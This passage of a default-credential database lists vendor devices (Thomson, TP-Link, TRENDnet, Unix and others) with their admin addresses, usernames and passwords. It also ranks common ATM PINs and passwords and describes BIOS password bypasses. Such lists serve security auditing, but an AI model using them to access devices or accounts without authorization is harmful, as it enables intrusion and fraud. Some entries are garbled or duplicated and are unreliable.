530,All,10.0.0.138,,,Admin,,\nthomson,SpeedTouch 536,,http://192.168.1.254,Administrator,,Administration,,\nthomson,SpeedTouch 536,Bigpond firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Bigpond-issued devices,\nthomson,SpeedTouch 536,Most,192.168.1.254,Administrator,,Admin,,\nthomson,SpeedTouch 536,v6 Telstra firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Telstra-issued devices,\nthomson,SpeedTouch 536,v6,192.168.1.254,Administrator,,Admin,,\nthomson,SpeedTouch 546,,http://192.168.1.254 or http://speedtouch.lan,Administrator,,Administration,,\nthomson,SpeedTouch 570,All,10.0.0.138,,,Admin,,\nthomson,SpeedTouch 576,1.7,http://192.168.1.67,blank,blank,admin,,\nthomson,SpeedTouch 580,,http://192.168.1.254,Administrator,,Administration,,\nthomson,SpeedTouch 580,Most,192.168.1.254,Administrator,,2012-01-08,,\nthomson,SpeedTouch 585,,http://192.168.1.254,Administrator,,Administration,,\nthomson,SpeedTouch 780 WL,SSID.SpeedTouchB,192.168.1.254,,,,,\nthomson,SpeedTouch AP 180,,,,admin,Admin,,\nthomson,SpeedTouch Home,,http://10.0.0.138,admin,admin,Administration,,\nthomson,SpeedTouch Home,All,10.0.0.138,(no default),(no default),Admin,,\nthomson,SpeedTouch Pro,,http://10.0.0.138,admin,admin,Administration,,\nthomson,SpeedTouch Pro,4-Port FW,10.0.0.138,,,Admin,,\nthomson,SpeedTouch Pro,4-Port,10.0.0.138,,,Admin,,\nthomson,SpeedTouch Pro,All,10.0.0.138,admin,admin,Admin,,\nthomson,SpeedTouch,,125.24.231.95,admin,suadmin,,,\nthomson,SpeedTouch261A3E,SpeedTouch585v6,,administrator,administrator,,,\nthomson,SpeedTouch580,,,admin,admin,,,\nthomson,SpeedTouch580,4.3.19,HTTP,admin,admin,,,\nthomson,Speedtouch 585,V6,,Admin,23698,,,\nthomson,TCW-710,,,,admin,Admin,,\nthomson,TG585,7,192.168.1.254,jalvarez,pc2119,Poniente 29,,\nthomson,TG585,v7,192.168.1.254,Administrator,,Admin,,\nthomson,TG782,,http://192.168.1.254/,,,admin,,\nthomson,TG782T,All,10.0.0.138 or 192.168.1.254 or bigpond.bigpond,admin,,Admin,Modem locked to Bigpond or Telstra,\nthomson,Technicolor TG587n,v3,admin,admin,Admin,2012-01-08,,\nthomson,speed touch,780i wl,,szilizs,keszeg,,,\nthomson,speedtouch 585V6,,,Admin,23698,,,\nthomson,win 7,st780wl,192.168.1.254,,,,,\nthomson,xp,all versions,http://192.168.1.254/,administrator,,administrator,,\ntiara networks,(router???),,1400 6100 6200,,tiara,,,\ntiara networks,(router???),,tiaranet,,tiara,,,\ntiara,1400,3.x,Console,tiara,tiaranet,Admin,also known as Tasman Networks routers,\ntiara,Tiara,,,tiara,tiaranet,,,\ntiaranetworks,(router???),1400 6100 6200,Multi,,tiara,tiaranet,,\ntibco,MFT Internet Server,,,admin,admin,,,\ntibco,Slingshot,,,admin,changeit,,,\ntim schaab,Mad.Thought,,2.0.1,theman,changeit,,,\ntimetools,SR Series NTP Server,,,admin,admin,,,\ntimschaab,Mad.Thought,2.0.1,http,theman,changeit,Admin,,\ntiny,PC BIOS,,,,Tiny,,,\ntiny,PC BIOS,,Console,,Tiny,Admin,,\ntinys,PC BIOS,,,,Tiny,,,\ntinys,PC BIOS,,,,tiny,,,\ntinys,PC BIOS,,Admin,,Tiny,,,\ntmc,PC BIOS,,,,BIGO,,,\ntmc,PC BIOS,,Admin,,BIGO,,,\ntmc,PC BIOS,,Console,,BIGO,Admin,,\ntop20mostusedatmpins,# 1,,ATM,,1234,,Used by 10.7 percent of all cardholders,\ntop20mostusedatmpins,# 2,,ATM,,1111,,Used by 6.02 percent of all cardholders,\ntop20mostusedatmpins,# 3,,ATM,,0000,,Used by 1.88 percent of all cardholders,\ntop20mostusedatmpins,# 4,,ATM,,1212,,Used by 1.2 percent of all cardholders,\ntop20mostusedatmpins,# 5,,ATM,,7777,,Used by 0.75 percent of all cardholders,\ntop20mostusedatmpins,# 6,,ATM,,1004,,Used by 0.62 percent of all cardholders,\ntop20mostusedatmpins,# 7,,ATM,,2000,,Used by 0.61 percent of all cardholders,\ntop20mostusedatmpins,# 8,,ATM,,4444,,Used by 0.53 percent of all cardholders,\ntop20mostusedatmpins,# 9,,ATM,,2222,,Used by 0.52 percent of all cardholders,\ntop20mostusedatmpins,#10,,ATM,,6969,,Used by 0.51 percent of all cardholders,\ntop20mostusedatmpins,#11,,ATM,,9999,,Used by 0.45 percent of all cardholders,\ntop20mostusedatmpins,#12,,ATM,,3333,,Used by 0.42 percent of all cardholders,\ntop20mostusedatmpins,#13,,ATM,,5555,,Used by 0.4 percent of all cardholders,\ntop20mostusedatmpins,#14,,ATM,,6666,,Used by 0.39 percent of all cardholders,\ntop20mostusedatmpins,#15,,ATM,,1122,,Used by 0.37 percent of all cardholders,\ntop20mostusedatmpins,#16,,ATM,,1313,,Used by 0.3 percent of all cardholders,\ntop20mostusedatmpins,#17,,ATM,,8888,,Used by 0.3 percent of all cardholders,\ntop20mostusedatmpins,#18,,ATM,,4321,,Used by 0.29 percent of all cardholders,\ntop20mostusedatmpins,#19,,ATM,,2001,,Used by 0.29 percent of all cardholders,\ntop20mostusedatmpins,#20,,ATM,,1010,,Used by 0.29 percent of all cardholders,\ntop26mostusedpasswords,# 2,,,,123456,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 3,,,,12345678,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 4,,,,qwerty,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 5,,,,abc123,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 6,,,,monkey,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 7,,,,1234567,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 8,,,,letmein,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 9,,,,trustno1,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#10,,,,dragon,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#11,,,,baseball,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#12,,,,111111,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#13,,,,iloveyou,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#14,,,,master,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#15,,,,sunshine,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#16,,,,ashley,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#17,,,,bailey,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#18,,,,passw0rd,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#19,,,,shadow,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#20,,,,123123,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#21,,,,654321,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#22,,,,superman,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#23,,,,qazwsx,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#24,,,,michael,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#25,,,,football,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#26,,,,sesame,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntoplayer,AppSwitch 2500,,,siteadmin,toplayer,,Any,\ntoplayer,AppSwitch,,,siteadmin,toplayer,,,\ntopsec,firewall,,Multi,superman,talent,Admin,,\ntoshiba 8000,Laptop,,,,,,,\ntoshiba 8000,Laptop,,Admin,,,,,\ntoshiba,Most laptops,,console,,,,,\ntoshiba,Most laptops,,console,,,CMOS,Hold left shift key during boot to bypass CMOS password,\ntoshiba,PC BIOS,,,,24Banc81,,,\ntoshiba,PC BIOS,,,,toshy99,,,\ntoshiba,PC BIOS,,Admin,,24Banc81,,,\ntoshiba,PC BIOS,,Admin,,Toshiba,,,\ntoshiba,PC BIOS,,Admin,,toshy99,,,\ntoshiba,PC BIOS,,Console,,24Banc81,Admin,,\ntoshiba,PC BIOS,,Console,,Toshiba,Admin,,\ntoshiba,PC BIOS,,Console,,toshy99,Admin,,\ntoshiba,PC BIOS,notebooks,Floppy Drive,,4B 45 59 00 00,Admin,If the first 5 bytes of sector 1 of a floppy in drive A are 4B 45 59 00 00 then you can bypass the password by hitting enter when prompted for it (yes this is really bad).,\ntoshiba,PC BIOS,notebooks,Floppy Drive,,4B 45 59 00 00,Admin,If the first 5 bytes of sector 1 of a floppy in drive A are 4B 45 59 00 00 then you can bypass the password by hitting enter when prompted for it (yes,\ntoshiba,TR-650,,,admin,tr650,,V2.01.00,\ntoshiba,Toshiba 8000 Laptop,,Multi,,,Admin,,\ntoshiba,e-Studio,,,admin,123456,,,\ntoshiba,eStudio,All versions,http://,admin,123456,admin,,\ntotolink,Soho Routers,,,onlime_r,12345,,,\ntotolink,Soho Routers,,,root,12345,,,\ntp link,Tp link,,,admin,admin,,,\ntplink,,TD-W8951ND,http://192.168.1.1/,admin,admin,admin,,\ntplink,TD-8610,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8610B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8616,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8616B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8810,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8811,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8816,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8816B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8817,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8817B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840T,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840TB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8101G,v1,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8101G,v3,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8151N,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8901G,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8901G,1G,http://192.168.1.1,,,admin,behsa,\ntplink,TD-W8901G,v6,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8901GB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8920,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8920G,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8950ND,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8951ND IGD,TD-W8951ND,,admin,2011,,,\ntplink,TD-W8951ND,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8951ND,5.1,192.168.1.1,,,,,\ntplink,TD-W8951ND,5.1,192.168.1.1,maxcom,1234,http,A lot of this routers with this pass in Mexico city,\ntplink,TD-W8951ND,5.1,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8960N,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8960NB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8961NB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8961ND,,http://192.168.1.1,admin,admin,,,\ntplink,TD-WDR4300,,http://192.168.0.1,admin,admin,,,\ntplink,TD-WR541G,,http://192.168.1.1,admin,admin,,,\ntplink,TD-WR642G,,,admin,admin,,,\ntplink,TL-MR3220,,http://192.168.1.1,admin,admin,,,\ntplink,TL-MR3420,,http://192.168.1.1,admin,admin,,,\ntplink,TL-SG5426,,,(),super,Enable privileged exec level from normal exec level,,\ntplink,TL-SG5426,,console or http://192.168.1.1,admin,admin,admin,,\ntplink,TL-SG5426,,console or http://192.168.1.1,guest,guest,user,,\ntplink,TL-WA500G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA501G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA5110G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA5210G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA541G,v2,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA541G,v7,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA542G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA543G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA601G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA701ND,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA730RE,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA801ND,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA901ND,V2,http://192.168.1.254,admin,admin,,,\ntplink,TL-WR1043N,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR1043ND,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR2543ND,,http://tplinklogin.net,admin,admin,,,\ntplink,TL-WR340G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR340GD,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR740N,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR740N,,http://tplinklogin.net,admin,admin,,,\ntplink,TL-WR741ND,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR743ND,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR841N,7.2,192.168.0.1,admin,admin,default,,\ntplink,TL-WR841N,V1,http://192.168.1.1,admin,admin,,also try http://192.168.1.1,\ntplink,TL-WR841N,V7,http://192.168.0.1,admin,admin,,,\ntplink,TL-WR841ND,V1,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR841ND,V7,http://192.168.0.1,admin,admin,,also try http://192.168.1.1,\ntplink,TL-WR940N,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR941N,all versions,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR941ND,all versions,http://192.168.1.1,admin,admin,,,\ntrend micro,InterScan VirusWall,,,admin,admin,,,\ntrend micro,Trend Micro,,,admin,admin,,,\ntrend micro,Viruswall,,Admin,admin,admin,,,\ntrend micro,Viruswall,,all versions,admin,admin,,,\ntrendmicro,,7.3,,admin,admin,,,\ntrendmicro,ISVW (VirusWall),,,admin,admin,,any,\ntrendmicro,Viruswall,all versions,HTTP on port 1812,admin,admin,Admin,,\ntrendnet,DI-524,802.11g/2.46hz,192.168.1.1,,,admin,,\ntrendnet,TDM-C500,101,ADSL,,,DEFAULT,,\ntrendnet,TEG-240WS,,http://192.168.0.1,,admin,Admin,,\ntrendnet,TEW 432 BRP,,HTTP://192.168.1.1,admin,admin,root,nothing,\ntrendnet,TEW 432BRP,all versions,http://192.168.1.1/,,,Admin,,\ntrendnet,TEW-231brp,,http://192.168.1.1,default,,Admin,,\ntrendnet,TEW-411BRP,,198.162.1.1,,admin,Admin access,,\ntrendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,,\ntrendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,konya,\ntrendnet,TEW-432BRP,,HTTP://192.168.1.1,admin,admin,root,nothing,\ntrendnet,TEW-432BRP,,http://192.168.0.1,,,,,\ntrendnet,TEW-432BRP,,http://192.168.10.1,admin,admin,,,\ntrendnet,TEW-432BRP,3.10b10,192.168.10.1,admin,admin,admin,,\ntrendnet,TEW-432BRP,TEW-432BRP,,hiua,xurxure,blank,,\ntrendnet,TEW-450APB,,,admin,admin,,,\ntrendnet,TEW-450APB,C1.0R,http://192.168.10.100,admin,admin,Admin user,This is from the manual - the trendnet website advertises the default as 192.168.1.1 which doesn't work.,\ntrendnet,TEW-452BRP,,http://192.168.1.1,admin,admin,,,\ntrendnet,TEW-510APB,,http://192.168.1.250,,admin,,,\ntrendnet,TEW-511BRP,,http://192.168.1.1,,admin,,,\ntrendnet,TEW-631BRP,,http://192.168.1.1,admin,admin,,,\ntrendnet,TEW-639GR,,192.168.10.1,admin,payago,,,\ntrendnet,TEW-652BRP h/w:v3.2r,3.00b13,http:192.168.10.1,admin,admin,admin,,\ntrendnet,TEW-652BRP,2.00b34,,,,S/N: C210226503821,H/W:V2.2R,\ntrendnet,TEW-652BRP,H/W:V1.OR,HTTP://192.168.10.1,ADMIN,ADMIN,ADMIN,,\ntrendnet,TEW-652BRP,H/W:V1.OR,HTTP://192.168.10.1,AMIN,ADMIN,ADMIN,,\ntrendnet,TEW-671BR,,http://192.168.10.1,admin,admin,Admin,,\ntrendnet,TK1601R,,,,0,,,\ntrendnet,TK1601R,,,,00000000,,,\ntrendnet,TK1602R,,,,0,,,\ntrendnet,TK1602R,,,,00000000,,,\ntrendnet,TK801R,,,,0,,,\ntrendnet,TK801R,,,,00000000,,,\ntrendnet,TK802R,,,,0,,,\ntrendnet,TK802R,,,,00000000,,,\ntrendnet,TPL110AP,,http://10.0.0.3,admin,admin,,,\ntrendnet,TRENDNET TEW411BRP,,198.162.1.1,,admin,Admin access,,\ntrendnet,TW100-BRF114,,http://192.168.0.1,,,,,\ntrendnet,TW100-BRV204,,,,,,,\ntrendnet,TW100-BRV304,,,,,,,\ntrendnet,TW100-S4W1CA,,http://192.168.0.1,admini,admini,admin,,\ntrendnet,TW100-S4W1CA,,http://192.168.1.1,,,,,\ntrendnet,tew-432brp,windows7,http://192.168.10,1,,admin,,\ntrendnet,tw100-s4w1ca,,http://192.168.0.1,admini,admini,admin,nnu stiu parola si numele vechi de la trendnet,\ntresystechnology,CLIP,,,,neutronbass,,Note that the docs strongly urge the installing tech to change this pass immediately.,\ntrintech,eAcquirer App/Data Servers,,,t3admin,Trintech,,,\ntrintech,eAcquirer,,,t3admin,Trintech,,,\ntriumphadler,CD1435 / DC 2435,,http://,Admin,Admin,admin,,\ntriumphadler,DC 2116,,,admin,0,,,\ntriumphadler,DC2116,1,http://,admin,0,admin,,\ntriumphadler,DC2116,1.0,http://,admin,0000,admin,,\ntroy,ExtendNet 100zx,,Multi,admin,extendnet,Admin,dizphunKt,\ntsunami,Tsunami-45,,,managers,managers,,,\ntsunami,Tsunami-45,1,Multi,managers,managers,,,\ntsunami,Tsunami-45,1.0,Multi,managers,managers,,,\ntvt system,Expresse G5 DS1 Module,,,,enter,,,\ntvt system,Expresse G5 DS1 Module,,Admin,,enter,,,\ntvt system,Expresse G5,,,craft,,,,\ntvt system,Expresse G5,,Admin,craft,,,,\ntvtsystem,Expresse G5 DS1 Module,,Multi,,enter,Admin,,\ntvtsystem,Expresse G5,,Multi,craft,,Admin,,\ntype3,Typo3,3.6,,admin,password,Admin,,\ntypo3,TYPO3,,3.6,admin,password,,,\nubiquitinetworks,Bullet 2,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,Bullet M2HP,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,NS2,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,PS2,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,all models,,,ubnt,ubnt,Admin,,\nunex,NexIP Routers,,,,password,,,\nunex,NexIP Routers,,HTTP,,password,Admin,,\nuniden,UIP1868P,,http://192.168.15.1,admin,UnidEn79!,Configuration,password is case sensitive,\nuniden,UIP1869V,,http://192.168.15.1,admin,admin,,,\nuniden,UIP300,,HTTP,user,123456,,,\nuniden,WNR2004,,http://192.168.1.1,UNIDEN,,,,\nunidesk,Management Appliance (MA),,,Administrator,Unidesk1,,,\nunify,OpenStage SIP Webinterface,,,,123456,,,\nunisys,ClearPath MCP,,Multi,ADMINISTRATOR,ADMINISTRATOR,Admin,,\nunisys,ClearPath MCP,,Multi,HTTP,HTTP,Web Server Administration,,\nunisys,ClearPath MCP,,Multi,NAU,NAU,Privileged,Network Administration Utility,\nunitedtechnologiescorporation,Interlogix truVision IP Camera,,,admin,1234,,,\nunix,Generic,,,adm,,,,\nunix,Generic,,,adm,adm,,,\nunix,Generic,,,admin,admin,,,\nunix,Generic,,,administrator,,,,\nunix,Generic,,,administrator,administrator,,,\nunix,Generic,,,anon,anon,,,\nunix,Generic,,,bbs,,,,\nunix,Generic,,,bbs,bbs,,,\nunix,Generic,,,bin,sys,,,\nunix,Generic,,,checkfs,checkfs,,,\nunix,Generic,,,checkfsys,checkfsys,,,\nunix,Generic,,,checksys,checksys,,,\nunix,Generic,,,daemon,daemon,,,\nunix,Generic,,,demo,,,,\nunix,Generic,,,demo,demo,,,\nunix,Generic,,,demos,,,,\nunix,Generic,,,demos,demos,,,\nunix,Generic,,,dni,,,,\nunix,Generic,,,fal,,,,\nunix,Generic,,,fal,fal,,,\nunix,Generic,,,fax,fax,,,\nunix,Generic,,,ftp,,,,\nunix,Generic,,,ftp,ftp,,,\nunix,Generic,,,games,games,,,\nunix,Generic,,,gopher,gopher,,,\nunix,Generic,,,gropher,,,,\nunix,Generic,,,guest,,,,\nunix,Generic,,,guest,guestgue,,,\nunix,Generic,,,halt,,,,\nunix,Generic,,,halt,halt,,,\nunix,Generic,,,informix,informix,,,\nunix,Generic,,,install,install,,,\nunix,Generic,,,lp,,,,\nunix,Generic,,,lp,lp,,,\nunix,Generic,,,lpadm,lpadm,,,\nunix,Generic,,,lpadmin,lpadmin,,,\nunix,Generic,,,lynx,,,,\nunix,Generic,,,mail,,,,\nunix,Generic,,,mail,mail,,,\nunix,Generic,,,man,man,,,\nunix,Generic,,,me,,,,\nunix,Generic,,,mountfs,mountfs,,,\nunix,Generic,,,mountfsys,mountfsys,,,\nunix,Generic,,,mountsys,mountsys,,,\nunix,Generic,,,news,news,,,\nunix,Generic,,,nobody,,,,\nunix,Generic,,,nobody,nobody,,,\nunix,Generic,,,nuucp,,,,\nunix,Generic,,,operator,,,,\nunix,Generic,,,operator,operator,,,\nunix,Generic,,,oracle,,,,\nunix,Generic,,,postmaster,postmast,,,\nunix,Generic,,,powerdown,powerdown,,,\nunix,Generic,,,rje,rje,,,\nunix,Generic,,,root,root,,,\nunix,Generic,,,setup,setup,,,\nunix,Generic,,,shutdown,,,,\nunix,Generic,,,shutdown,shutdown,,,\nunix,Generic,,,sync,,,,\nunix,Generic,,,sync,sync,,,\nunix,Generic,,,sys,sys,,,\nunix,Generic,,,sys,system,,,\nunix,Generic,,,sysadm,admin,,,\nunix,Generic,,,sysadm,sysadm,,,\nunix,Generic,,,sysadmin,sysadmin,,,\nunix,Generic,,,sysbin,sysbin,,,\nunix,Generic,,,system_admin,,,,\nunix,Generic,,,system_admin,system_admin,,,\nunix,Generic,,,trouble,trouble,,,\nunix,Generic,,,umountfs,umountfs,,,\nunix,Generic,,,umountfsys,umountfsys,,,\nunix,Generic,,,umountsys,umountsys,,,\nunix,Generic,,,unix,unix,,,\nunix,Generic,,,user,user,,,\nunix,Generic,,,uucp,uucp,,,\nunix,Generic,,,uucpadm,uucpadm,,,\nunix,Generic,,,web,,,,\nunix,Generic,,,web,web,,,\nunix,Generic,,,webmaster,,,,\nunix,Generic,,,www,,,,\nunix,Generic,,Admin,adm,,,,\nunix,Generic,,Admin,adm,adm,,,\nunix,Generic,,Admin,bin,sys,,,\nunix,Generic,,Admin,install,install,,,\nunix,Generic,,Admin,mountfs,mountfs,,,\nunix,Generic,,Admin,mountfsys,mountfsys,,,\nunix,Generic,,Admin,mountsys,mountsys,,,\nunix,Generic,,Admin,root,,,,\nunix,Generic,,Admin,root,hp,,,\nunix,Generic,,Admin,root,root,,,\nunix,Generic,,Admin,setup,setup,,,\nunix,Generic,,Admin,sys,bin,,,\nunix,Generic,,Admin,sys,sys,,,\nunix,Generic,,Admin,sys,system,,,\nunix,Generic,,Admin,sysadm,admin,,,\nunix,Generic,,Admin,sysadm,sysadm,,,\nunix,Generic,,Admin,sysadmin,sysadmin,,,\nunix,Generic,,Admin,sysbin,sysbin,,,\nunix,Generic,,Admin,system_admin,,,,\nunix,Generic,,Admin,system_admin,system_admin,,,\nunix,Generic,,HP-UX,root,hp,,,\nunix,Generic,,Multi,adm,,Admin,,\nunix,Generic,,Multi,adm,adm,Admin,,\nunix,Generic,,Multi,admin,admin,User,,\nunix,Generic,,Multi,administrator,,User,,\nunix,Generic,,Multi,administrator,administrator,User,,\nunix,Generic,,Multi,anon,anon,User,,\nunix,Generic,,Multi,bbs,,User,,\nunix,Generic,,Multi,bbs,bbs,User,,\nunix,Generic,,Multi,bin,sys,Admin,,\nunix,Generic,,Multi,checkfs,checkfs,User,,\nunix,Generic,,Multi,checkfsys,checkfsys,User,,\nunix,Generic,,Multi,checksys,checksys,User,,\nunix,Generic,,Multi,daemon,,User,,\nunix,Generic,,Multi,daemon,daemon,User,,\nunix,Generic,,Multi,demo,,User,,\nunix,Generic,,Multi,demo,demo,User,,\nunix,Generic,,Multi,demos,,User,,\nunix,Generic,,Multi,demos,demos,User,,\nunix,Generic,,Multi,dni,,User,,\nunix,Generic,,Multi,dni,dni,User,,\nunix,Generic,,Multi,fal,,User,,\nunix,Generic,,Multi,fal,fal,User,,\nunix,Generic,,Multi,fax,,User,,\nunix,Generic,,Multi,fax,fax,User,,\nunix,Generic,,Multi,ftp,,User,,\nunix,Generic,,Multi,ftp,ftp,User,,\nunix,Generic,,Multi,games,,User,,\nunix,Generic,,Multi,games,games,User,,\nunix,Generic,,Multi,gopher,gopher,User,,\nunix,Generic,,Multi,gropher,,User,,\nunix,Generic,,Multi,guest,,User,,\nunix,Generic,,Multi,guest,guest,User,,\nunix,Generic,,Multi,guest,guestgue,User,,\nunix,Generic,,Multi,halt,,User,,\nunix,Generic,,Multi,halt,halt,User,,\nunix,Generic,,Multi,informix,informix,User,,\nunix,Generic,,Multi,install,install,Admin,,\nunix,Generic,,Multi,lp,,User,,\nunix,Generic,,Multi,lp,bin,User,,\nunix,Generic,,Multi,lp,lineprin,User,,\nunix,Generic,,Multi,lp,lp,User,,\nunix,Generic,,Multi,lpadm,lpadm,User,,\nunix,Generic,,Multi,lpadmin,lpadmin,User,,\nunix,Generic,,Multi,lynx,,User,,\nunix,Generic,,Multi,lynx,lynx,User,,\nunix,Generic,,Multi,mail,,User,,\nunix,Generic,,Multi,mail,mail,User,,\nunix,Generic,,Multi,man,,User,,\nunix,Generic,,Multi,man,man,User,,\nunix,Generic,,Multi,me,,User,,\nunix,Generic,,Multi,me,me,User,,\nunix,Generic,,Multi,mountfs,mountfs,Admin,,\nunix,Generic,,Multi,mountfsys,mountfsys,Admin,,\nunix,Generic,,Multi,mountsys,mountsys,Admin,,\nunix,Generic,,Multi,news,,User,,\nunix,Generic,,Multi,news,news,User,,\nunix,Generic,,Multi,nobody,,User,,\nunix,Generic,,Multi,nobody,nobody,User,,\nunix,Generic,,Multi,nuucp,,User,,\nunix,Generic,,Multi,operator,,User,,\nunix,Generic,,Multi,operator,operator,User,,\nunix,Generic,,Multi,oracle,,User,,\nunix,Generic,,Multi,postmaster,,User,,\nunix,Generic,,Multi,postmaster,postmast,User,,\nunix,Generic,,Multi,powerdown,powerdown,User,,\nunix,Generic,,Multi,root,,Admin,,\nunix,Generic,,Multi,root,root,Admin,,\nunix,Generic,,Multi,setup,setup,Admin,,\nunix,Generic,,Multi,shutdown,,User,,\nunix,Generic,,Multi,shutdown,shutdown,User,,\nunix,Generic,,Multi,sync,,User,,\nunix,Generic,,Multi,sync,sync,User,,\nunix,Generic,,Multi,sys,bin,Admin,,\nunix,Generic,,Multi,sys,sys,Admin,,\nunix,Generic,,Multi,sys,system,Admin,,\nunix,Generic,,Multi,sysadm,admin,Admin,,\nunix,Generic,,Multi,sysadm,sysadm,Admin,,\nunix,Generic,,Multi,sysadmin,sysadmin,Admin,,\nunix,Generic,,Multi,sysbin,sysbin,Admin,,\nunix,Generic,,Multi,system_admin,,Admin,,\nunix,Generic,,Multi,system_admin,system_admin,Admin,,\nunix,Generic,,Multi,trouble,trouble,User,,\nunix,Generic,,Multi,umountfs,umountfs,User,,\nunix,Generic,,Multi,umountfsys,umountfsys,User,,\nunix,Generic,,Multi,umountsys,umountsys,User,,\nunix,Generic,,Multi,unix,unix,User,,\nunix,Generic,,Multi,user,user,User,,\nunix,Generic,,Multi,uucp,uucp,User,,\nunix,Generic,,Multi,uucpadm,uucpadm,User,,\nunix,Generic,,Multi,web,,User,,\nunix,Generic,,Multi,web,web,User,,\nunix,Generic,,Multi,webmaster,,User,,\nunix,Generic,,Multi,webmaster,webmaster,User,,\nunix,Generic,,Multi,www,,User,,\nunix,Generic,,Multi,www,www,User,,\nunix,Generic,,User,admin,admin,,,\nunix,Generic,,User,administrator,,,,\nunix,Generic,,User,administrator,administrator,,,\nunix,Generic,,User,anon,anon,,,\nunix,Generic,,User,bbs,,,,\nunix,Generic,,User,bbs,bbs,,,\nunix,Generic,,User,checkfs,checkfs,,,\nunix,Generic,,User,checkfsys,checkfsys,,,\nunix,Generic,,User,checksys,checksys,,,\nunix,Generic,,User,daemon,,,,\nunix,Generic,,User,daemon,daemon,,,\nunix,Generic,,User,demo,,,,\nunix,Generic,,User,demo,demo,,,\nunix,Generic,,User,demos,,,,\nunix,Generic,,User,demos,demos,,,\nunix,Generic,,User,dni,,,,\nunix,Generic,,User,dni,dni,,,\nunix,Generic,,User,fal,,,,\nunix,Generic,,User,fa